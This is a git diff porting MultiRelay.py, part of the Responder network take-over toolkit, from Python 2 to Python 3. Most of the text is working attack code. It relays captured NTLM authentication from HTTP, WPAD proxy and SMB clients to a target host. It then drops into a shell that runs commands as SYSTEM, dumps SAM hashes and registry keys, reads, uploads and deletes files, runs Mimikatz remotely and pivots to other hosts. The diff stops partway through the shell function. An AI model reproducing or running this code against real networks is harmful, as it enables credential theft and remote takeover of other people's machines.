diff --git a/tools/MultiRelay.py b/tools/MultiRelay.py
index db4416d..5a45085 100755
--- a/tools/MultiRelay.py
+++ b/tools/MultiRelay.py
@@ -1,4 +1,5 @@
#!/usr/bin/env python
+# -*- coding: latin-1 -*-
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
@@ -15,6 +16,11 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
import sys
+if (sys.version_info > (3, 0)):
+ PY2OR3 = "PY3"
+else:
+ PY2OR3 = "PY2"
+ sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
import re
import os
import logging
@@ -23,26 +29,29 @@ import time
import random
import subprocess
from threading import Thread
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+if PY2OR3 is "PY3":
+ from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+else:
+ from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+
try:
from Crypto.Hash import MD5
except ImportError:
- print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes."
- print "You can install it on debian based os with this command: apt-get install python-crypto"
- print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n"
+ print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
+ print("You can install it on debian based os with this command: apt-get install python-crypto")
+ print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
- print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
+ print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
-
from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
from socket import *
-__version__ = "2.0"
+__version__ = "2.5"
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
@@ -72,18 +81,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script
options, args = parser.parse_args()
if options.TARGET is None:
- print "\n-t Mandatory option is missing, please provide a target.\n"
+ print("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
- print "\n-u Mandatory option is missing, please provide a username to relay.\n"
+ print("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
- print color("[!] MultiRelay must be run as root.")
+ print((color("[!] MultiRelay must be run as root.")))
sys.exit(-1)
OneCommand = options.OneCommand
@@ -98,62 +107,83 @@ Pivoting = [2]
def color(txt, code = 1, modifier = 0):
- return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+ return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome():
- print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
- print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
- print 'Usernames to relay (-u) are case sensitive.'
- print 'To kill this script hit CTRL-C.\n'
- print color('/*',8,1)
- print 'Use this script in combination with Responder.py for best results.'
- print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
- print 'This tool listen on TCP port 80, 3128 and 445.'
- print 'For optimal pwnage, launch Responder only with these 2 options:'
- print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.'
- print 'If you do so, use taskkill (as system) to kill the process.'
- print color('*/',8,1)
- print color('\nRelaying credentials for these users:',8,1)
- print color(UserToRelay,4,1)
- print '\n'
+ print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
+ print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
+ print('Usernames to relay (-u) are case sensitive.')
+ print('To kill this script hit CTRL-C.\n')
+ print(color('/*',8,1))
+ print('Use this script in combination with Responder.py for best results.')
+ print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
+ print('This tool listen on TCP port 80, 3128 and 445.')
+ print('For optimal pwnage, launch Responder only with these 2 options:')
+ print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
+ print('If you do so, use taskkill (as system) to kill the process.')
+ print(color('*/',8,1))
+ print(color('\nRelaying credentials for these users:',8,1))
+ print(color(UserToRelay,4,1))
+ print('\n')
ShowWelcome()
def ShowHelp():
- print color('Available commands:',8,0)
- print color('dump',8,1)+' -> Extract the SAM database and print hashes.'
- print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)'
- print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)'
- print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)'
- print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)'
- print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\'
- print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)'
- print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to'
- print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)'
- print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)'
- print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)'
- print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
- print color('help',8,1)+' -> Print this message.'
- print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
- print ' If you want to quit type exit and then use CTRL-C\n'
- print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
+ print(color('Available commands:',8,0))
+ print(color('dump',8,1)+' -> Extract the SAM database and print hashes.')
+ print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
+ print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
+ print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
+ print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
+ print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
+ print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
+ print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
+ print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
+ print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
+ print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
+ print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
+ print(color('help',8,1)+' -> Print this message.')
+ print(color('exit',8,1)+' -> Exit this shell and return in relay mode.')
+ print(' If you want to quit type exit and then use CTRL-C\n')
+ print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+def NetworkSendBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+ if PY2OR3 is "PY2":
+ return str(data)
+ else:
+ return str(data.decode('latin-1'))
+
+def StructPython2or3(endian,data):
+ #Python2...
+ if PY2OR3 == "PY2":
+ return struct.pack(endian, len(data))
+ #Python3...
+ else:
+ return struct.pack(endian, len(data)).decode('latin-1')
+
def UploadContent(File):
- with file(File) as f:
+ with open(File,'rb') as f:
s = f.read()
- FileLen = len(s)
- FileContent = s
+ FileLen = len(s.decode('latin-1'))
+ FileContent = s.decode('latin-1')
return FileLen, FileContent
try:
RunFinger(Host[0])
except:
- print "The host %s seems to be down or port 445 down."%(Host[0])
+ raise
+ print("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1)
@@ -161,49 +191,49 @@ def get_command():
global Cmd
Cmd = []
while any(x in Cmd for x in Cmd) is False:
- Cmd = [raw_input("C:\\Windows\\system32\\:#")]
+ Cmd = [input("C:\\Windows\\system32\\:#")]
#Function used to make sure no connections are accepted while we have an open shell.
#Used to avoid any possible broken pipe.
def IsShellOpen():
#While there's nothing in our array return false.
if any(x in ShellOpen for x in ShellOpen) is False:
- return False
+ return False
#If there is return True.
else:
- return True
+ return True
#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
def IsPivotOn():
#While there's nothing in our array return false.
if Pivoting[0] == "2":
- return False
+ return False
#If there is return True.
if Pivoting[0] == "1":
- return True
+ print("pivot is on")
+ return True
def ConnectToTarget():
+ try:
+ s = socket(AF_INET, SOCK_STREAM)
+ s.connect((Host[0],445))
+ return s
+ except:
try:
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((Host[0],445))
- return s
+ sys.exit(1)
+ print("Cannot connect to target, host down?")
except:
- try:
- sys.exit(1)
- print "Cannot connect to target, host down?"
- except:
- pass
+ pass
class HTTPProxyRelay(BaseRequestHandler):
def handle(self):
-
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
- return None
+ return None
if IsPivotOn():
- return None
+ return None
except:
raise
@@ -219,87 +249,85 @@ class HTTPProxyRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
- if NTLM_Auth:
+ if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
- Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+ Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
- if Packet_NTLM == "\x01":
- ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
- h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
- n = SMBNegoCairo(Data = SMBNegoCairoData())
- n.calculate()
- packet0 = str(h)+str(n)
- buffer0 = longueur(packet0)+packet0
- s.send(buffer0)
- smbdata = s.recv(2048)
- ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
- if smbdata[8:10] == "\x72\x00":
- head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
- t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+ if Packet_NTLM == "\x01":
+ ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+ h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+ n = SMBNegoCairo(Data = SMBNegoCairoData())
+ n.calculate()
+ packet0 = str(h)+str(n)
+ buffer0 = longueur(packet0)+packet0
+ s.send(buffer0)
+ smbdata = s.recv(2048)
+ ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+ if smbdata[8:10] == "\x72\x00":
+ head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+ t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ smbdata = s.recv(2048) #got it here.
+
+ ## Send HTTP Proxy
+ Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+ Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+ key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+ self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+ data = self.request.recv(8092)
+ NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+ Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+ ##Got NTLM Message 3 from client.
+ if Packet_NTLM == "\x03":
+ NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+ ##Might be anonymous, verify it and if so, send no go to client.
+ if IsSMBAnonymous(NTLM_Auth):
+ Response = WPAD_Auth_407_Ans()
+ self.request.send(str(Response))
+ data = self.request.recv(8092)
+ else:
+ #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+ #and has not attempted before. While at it, let's grab his hash.
+ Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+ if Username is not None:
+ head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+ t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- smbdata = s.recv(2048) #got it here.
+ print("[+] SMB Session Auth sent.")
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ smbdata = s.recv(2048)
+ RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+ if RunCmd is None:
+ s.close()
+ self.request.close()
+ return None
- ## Send HTTP Proxy
- Buffer_Ans = WPAD_NTLM_Challenge_Ans()
- Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
- key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
- self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
- data = self.request.recv(8092)
- NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
- Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
-
- ##Got NTLM Message 3 from client.
- if Packet_NTLM == "\x03":
- NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
- ##Might be anonymous, verify it and if so, send no go to client.
- if IsSMBAnonymous(NTLM_Auth):
- Response = WPAD_Auth_407_Ans()
- self.request.send(str(Response))
- data = self.request.recv(8092)
- else:
- #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
- #and has not attempted before. While at it, let's grab his hash.
- Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
-
- if Username is not None:
- head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
- t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- print "[+] SMB Session Auth sent."
- s.send(buffer1)
- smbdata = s.recv(2048)
- RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
- if RunCmd is None:
- s.close()
- self.request.close()
- return None
-
- else:
+ else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
- self.request.send(str(Response))
+ self.request.send(str(Response))
except Exception:
- self.request.close()
+ self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
- pass
+ pass
class HTTPRelay(BaseRequestHandler):
def handle(self):
-
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
- return None
+ return None
if IsPivotOn():
- return None
+ return None
except:
raise
@@ -311,16 +339,16 @@ class HTTPRelay(BaseRequestHandler):
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
- self.request.send(Webdav)
+ self.request.send(NetworkSendBufferPython2or3(Webdav))
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
- if NTLM_Auth:
+ if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
- Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+ Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
- if Packet_NTLM == "\x01":
+ if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
@@ -336,110 +364,110 @@ class HTTPRelay(BaseRequestHandler):
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
- Buffer_Ans = IIS_NTLM_Challenge_Ans()
- Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+ Buffer_Ans = IIS_NTLM_Challenge_Ans()
+ Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
- self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+ self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
- if Packet_NTLM == "\x03":
- NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
- ##Might be anonymous, verify it and if so, send no go to client.
- if IsSMBAnonymous(NTLM_Auth):
- Response = IIS_Auth_401_Ans()
- self.request.send(str(Response))
- data = self.request.recv(8092)
- else:
- #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
- #and has not attempted before. While at it, let's grab his hash.
- Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+ if Packet_NTLM == "\x03":
+ NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+ ##Might be anonymous, verify it and if so, send no go to client.
+ if IsSMBAnonymous(NTLM_Auth):
+ Response = IIS_Auth_401_Ans()
+ self.request.send(str(Response))
+ data = self.request.recv(8092)
+ else:
+ #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+ #and has not attempted before. While at it, let's grab his hash.
+ Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
- if Username is not None:
- head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
- t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- print "[+] SMB Session Auth sent."
- s.send(buffer1)
- smbdata = s.recv(2048)
- RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
- if RunCmd is None:
- s.close()
- self.request.close()
- return None
+ if Username is not None:
+ head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+ t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ print("[+] SMB Session Auth sent.")
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ smbdata = s.recv(2048)
+ RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+ if RunCmd is None:
+ s.close()
+ self.request.close()
+ return None
- else:
+ else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
- self.request.send(str(Response))
+ self.request.send(str(Response))
except Exception:
- self.request.close()
+ self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
- pass
+ pass
class SMBRelay(BaseRequestHandler):
def handle(self):
-
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
- return None
+ return None
except:
raise
- s = ConnectToTarget()
try:
- data = self.request.recv(4096)
+ s = ConnectToTarget()
+
+ data = self.request.recv(8092)
##Negotiate proto answer. That's us.
- if data[8:10] == "\x72\x00":
- head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
- t = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(data))
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- self.request.send(buffer1)
+ if data[8:10] == b'\x72\x00':
+ Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
+ Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+ packet1 = str(Header)+str(Body)
+ Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+ self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(4096)
## Make sure it's not a Kerberos auth.
- if data.find("NTLM") != -1:
- ## Start with nego protocol + session setup negotiate to our target.
- data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
+ if data.find(b'NTLM') is not -1:
+ ## Start with nego protocol + session setup negotiate to our target.
+ data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
- ## Make sure it's not a Kerberos auth.
- if data.find("NTLM") != -1:
- ##Relay all that to our client.
- if data[8:10] == "\x73\x00":
- head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
- #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
- #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
- t = smbdata[36:]
- packet0 = str(head)+str(t)
- buffer0 = longueur(packet0)+packet0
- self.request.send(buffer0)
- data = self.request.recv(4096)
+ ## Make sure it's not a Kerberos auth.
+ if data.find(b'NTLM') is not -1:
+ ##Relay all that to our client.
+ if data[8:10] == b'\x73\x00':
+ head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+ #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
+ #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
+ t = smbdata[36:].decode('latin-1')
+ packet0 = str(head)+str(t)
+ buffer0 = longueur(packet0)+packet0
+ self.request.send(NetworkSendBufferPython2or3(buffer0))
+ data = self.request.recv(4096)
else:
- #if it's kerberos, ditch the connection.
- s.close()
- return None
+ #if it's kerberos, ditch the connection.
+ s.close()
+ return None
- if IsSMBAnonymous(data):
+ if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
##Send logon failure for anonymous logins.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- self.request.send(buffer1)
+ self.request.send(NetworkSendBufferPython2or3(buffer1))
s.close()
return None
@@ -449,18 +477,18 @@ class SMBRelay(BaseRequestHandler):
Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
- head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
- t = data[36:]#Final relay.
+ head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
+ t = data[36:].decode('latin-1')#Final relay.
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
if Pivoting[0] == "1":
- pass
+ pass
else:
- print "[+] SMB Session Auth sent."
- s.send(buffer1)
+ print("[+] SMB Session Auth sent.")
+ s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(4096)
#We're all set, dropping into shell.
- RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+ RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
@@ -469,20 +497,20 @@ class SMBRelay(BaseRequestHandler):
return None
else:
- ##Send logon failure, so our client might authenticate with another account.
- head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
- t = SMBSessEmpty()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- self.request.send(buffer1)
- data = self.request.recv(4096)
- self.request.close()
- return None
+ ##Send logon failure, so our client might authenticate with another account.
+ head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+ t = SMBSessEmpty()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ self.request.send(NetworkSendBufferPython2or3(buffer1))
+ data = self.request.recv(4096)
+ self.request.close()
+ return None
except Exception:
- self.request.close()
+ self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
- pass
+ pass
#Interface starts here.
@@ -498,92 +526,92 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
ShellOpen = ["Shell is open"]
# On this block we do some verifications before dropping the user into the shell.
- if data[8:10] == "\x73\x6d":
- print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target."
- print "[+] Hashes were saved anyways in Responder/logs/ folder.\n"
+ if data[8:10] == b'\x73\x6d':
+ print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
+ print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
- if data[8:10] == "\x73\x8d":
- print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
+ if data[8:10] == b'\x73\x8d':
+ print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
- if data[8:10] == "\x73\x5e":
- print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n"
+ if data[8:10] == b'\x73\x5e':
+ print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect
- if data[8:10] == "\x73\x00":
+ if data[8:10] == b'\x73\x00':
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Nope he doesn't.
- if data[8:10] == "\x75\x22":
+ if data[8:10] == b'\x75\x22':
if Pivoting[0] == "1":
- pass
+ pass
else:
- print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
- Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+ print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+ Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
- if data[8:10] == "\x75\xcc":
- print "[+] Tree Connect AndX denied. Bad Network Name returned."
+ if data[8:10] == b'\x75\xcc':
+ print("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
## Tree Connect on C$ is successfull.
- if data[8:10] == "\x75\x00":
+ if data[8:10] == b'\x75\x00':
if Pivoting[0] == "1":
- pass
+ pass
else:
- print "[+] Looks good, "+Username+" has admin rights on C$."
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ print("[+] Looks good, "+Username+" has admin rights on C$.")
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Run one command.
- if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
- print "[+] Authenticated."
+ if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
+ print("[+] Authenticated.")
if OneCommand != None:
